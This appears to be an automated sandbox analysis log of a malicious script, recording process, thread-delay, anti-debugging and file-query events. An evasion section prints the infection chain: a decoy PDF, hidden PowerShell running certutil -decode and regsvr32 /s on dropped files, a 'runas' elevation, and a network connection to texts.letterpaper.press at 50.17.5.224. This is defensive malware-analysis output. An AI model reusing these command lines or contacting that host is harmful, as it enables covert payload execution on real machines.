Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460	Thread sleep count: 1018 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956	Thread sleep count: 33 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 4236	Thread sleep count: 59 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 4236	Thread sleep time: -590000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2148	Thread sleep count: 587 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 1380	Thread sleep count: 35 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 1380	Thread sleep time: -2100000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2812	Thread sleep count: 39 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 2812	Thread sleep time: -2340000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2372	Thread sleep time: -2100000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1339	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 752	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 361	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1543
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1018
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 587

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened / queried: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1

Source: C:\Windows\System32\regsvr32.exe

API coverage: 4.7 %

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3188 FindFirstFileW,	13_2_00007FF983DE3188
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB66E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,	13_2_00007FF983DB66E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD84FC FindFirstFileExW,	13_2_00007FF983DD84FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB6BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	13_2_00007FF983DB6BB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53188 FindFirstFileW,	19_2_00007FF983D53188
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D266E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,	19_2_00007FF983D266E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D484FC FindFirstFileExW,	19_2_00007FF983D484FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D26BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	19_2_00007FF983D26BB0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\regsvr32.exe

API call chain: ExitProcess graph end node

Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.569859392.0000027E9B780000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DE3280 IsDebuggerPresent,

13_2_00007FF983DE3280

Source: C:\Windows\System32\regsvr32.exe

13_2_00007FF983DABCCF

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DD9B80 GetProcessHeap,

13_2_00007FF983DD9B80

Source: C:\Windows\System32\regsvr32.exe

Process token adjusted: Debug

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB9314 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,TerminateProcess,	13_2_00007FF983DB9314
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3248 SetUnhandledExceptionFilter,	13_2_00007FF983DE3248
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB9F90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00007FF983DB9F90
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DBDEB8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00007FF983DBDEB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D29314 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,TerminateProcess,	19_2_00007FF983D29314
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53248 SetUnhandledExceptionFilter,	19_2_00007FF983D53248
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D29F90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00007FF983D29F90
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D2DEB8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00007FF983D2DEB8

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\regsvr32.exe	Domain query: texts.letterpaper.press
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 50.17.5.224 80

Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
